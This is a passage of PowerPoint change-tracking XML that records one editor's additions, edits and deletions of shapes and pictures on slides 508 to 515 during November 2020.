        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:12.057" v="5626" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2383277498" sldId="508"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T15:53:20.731" v="2211" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2383277498" sldId="508"/>
            <ac:spMk id="2" creationId="{4D9ECCCC-AFA2-46B8-840D-3248FA8025B6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:21:37.357" v="3579" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2383277498" sldId="508"/>
            <ac:spMk id="3" creationId="{C2015DEE-B95C-4C79-8FAC-F60E94F5021C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:21:59.284" v="3583" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2383277498" sldId="508"/>
            <ac:spMk id="5" creationId="{14CC01B7-A44D-49D5-BB31-3C7D9CE54B51}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:12.057" v="5626" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2383277498" sldId="508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0T15:53:28.710" v="2214" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2383277498" sldId="508"/>
            <ac:picMk id="4" creationId="{F01C9980-EAB8-4143-873A-B3F75A6B7922}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:59:50.120" v="5600" actId="947"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3036739782" sldId="509"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:35:29.591" v="3880" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="2" creationId="{FA095CE1-D26E-473D-A197-D422B347CB84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:35:29.591" v="3880" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="3" creationId="{B580BEC3-933A-4C15-ADBC-D0D46D8992F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:35:29.591" v="3880" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="4" creationId="{29856958-F94D-4ADB-B78C-1B6C45357CD9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:49:10.545" v="5312" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="5" creationId="{B672B4C9-E2E8-41F7-B624-C11DCA5BFFC4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:32:24.160" v="3138" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:50:23.358" v="5357" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="6" creationId="{FF9383D7-6AED-48F2-81EC-26817CE69A6A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:32:24.160" v="3138" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:32:24.160" v="3138" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:32:24.160" v="3138" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:32:24.160" v="3138" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="58" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:59:50.120" v="5600" actId="947"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="61" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:32:20.887" v="3136" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:spMk id="65" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:31:19.565" v="2631" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:picMk id="4" creationId="{3A932683-787F-4E19-A442-C225A936434D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:31:20.271" v="2632" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:picMk id="10" creationId="{783D0306-0C16-4030-AE93-EC6B465A3ED0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:35:36.238" v="3881" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3036739782" sldId="509"/>
            <ac:picMk id="12" creationId="{D34FB582-870E-4041-AFB0-3D675AED344E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:59:32.528" v="5597" actId="947"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2601554486" sldId="510"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:48:39.117" v="5289" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:spMk id="2" creationId="{1E83C5AD-82E3-462D-8590-4B344E5DB1F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:31:20.174" v="3133" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:31:20.174" v="3133" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:31:20.174" v="3133" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:31:05.984" v="3131" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510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6:47:49.143" v="5263" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:spMk id="58" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:59:32.528" v="5597" actId="947"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:spMk id="61" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:30:43.088" v="3093" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:spMk id="65" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:30:41.312" v="3091" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:picMk id="4" creationId="{3A932683-787F-4E19-A442-C225A936434D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:30:41.951" v="3092" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2601554486" sldId="510"/>
            <ac:picMk id="10" creationId="{783D0306-0C16-4030-AE93-EC6B465A3ED0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:42.560" v="5610" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="607438204" sldId="511"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:20:20.327" v="3526" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="607438204" sldId="511"/>
            <ac:spMk id="2" creationId="{6F533BCE-5ACA-4148-808A-F9C7A6FA9BA0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:42.560" v="5610" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="607438204" sldId="511"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:20:22.348" v="3527" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="607438204" sldId="511"/>
            <ac:picMk id="9" creationId="{05D784DE-F42A-41A7-AE82-F73F117D6A57}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:16.408" v="5604" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1466017043" sldId="512"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:58:27.481" v="5562" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="2" creationId="{1C9F34F7-A246-432E-B900-67991575F499}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:58:27.481" v="5562" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="3" creationId="{00C051C5-1CBD-4ABA-905E-A9AF04771D22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:58:27.783" v="5563" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="5" creationId="{2D4E13C2-2681-4A45-A038-02D311B80240}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:30.267" v="3360" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:58:35.733" v="5571" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="6" creationId="{2FB2206F-AA3A-4A4D-8616-4852B907360F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:32.418" v="3362" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:59:09.869" v="5596" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="7" creationId="{828CA7DD-C969-4BFC-B700-DCB11D381059}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:31.714" v="3361" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:58:55.238" v="5572" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="8" creationId="{00C4F249-0D92-45B9-BCF8-92E0B1C82CB3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:41.450" v="3368" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:58:55.238" v="5572" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="9" creationId="{C9072C48-0F7E-45AB-9701-C31F0E95BB9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:38.425" v="3366" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="58" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:16.408" v="5604" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="61" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:28.980" v="3359" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:spMk id="65" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:49.632" v="3371" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:picMk id="4" creationId="{3A932683-787F-4E19-A442-C225A936434D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:54.056" v="3372" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1466017043" sldId="512"/>
            <ac:picMk id="10" creationId="{783D0306-0C16-4030-AE93-EC6B465A3ED0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:04:43.567" v="5707" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3080854691" sldId="513"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:40:10.453" v="3943" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3080854691" sldId="513"/>
            <ac:spMk id="2" creationId="{AD24D0F2-93D8-494A-96DD-D750C3ADE08C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:04:28.831" v="5701" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3080854691" sldId="513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7:00:57.482" v="5618" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3080854691" sldId="513"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:41:54.742" v="4031" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3080854691" sldId="513"/>
            <ac:spMk id="20" creationId="{DBA4B4C7-5B76-45D3-9FC5-88180F8DF778}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:04:43.567" v="5707" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3080854691" sldId="513"/>
            <ac:spMk id="21" creationId="{1441C76B-5FD8-44C3-BF2E-9777FCFB2D32}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg delAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:24.176" v="5634" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1591516120" sldId="514"/>
        </pc:sldMkLst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2" creationId="{DFF50650-19FC-40EA-A1A3-0C8E37FF2114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3" creationId="{E50E13DC-8297-4AFC-822C-9FDB8126A1B3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4" creationId="{8D504039-3F65-470A-A2B9-BF2D78BAFE86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5" creationId="{E9303EC2-78C3-4CC2-8B77-535D704550E2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7" creationId="{18021295-357B-4C08-86B9-7EA9815F653D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8" creationId="{6D9F4524-A54D-42DB-A299-C59BE0E9D6A6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9" creationId="{3988E140-FDE7-491D-90C6-0F2376A47D95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10" creationId="{AB78B182-FC70-475D-BCD5-7AAC7F2105E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:44:32.583" v="4038" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1591516120" sldId="514"/>
            <ac:spMk id="11" creationId="{DECF0034-CAC0-44FA-B1DE-E442B3FEBAD1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12" creationId="{B6266446-7AEE-4183-9FA2-ACB98193A429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14" creationId="{3287305B-CFF4-48C4-9278-F5FD8F23F376}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:44:29.901" v="4037" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1591516120" sldId="514"/>
            <ac:spMk id="15" creationId="{A326DA89-546C-4922-81A2-991782219898}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:24.176" v="5634" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1591516120" sldId="514"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:48:39.866" v="4065" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1591516120" sldId="514"/>
            <ac:picMk id="13" creationId="{8D17C4C9-5DAE-44EC-9443-DC11DBE2F414}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T05:52:55.060" v="4109" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3391284972" sldId="515"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim">
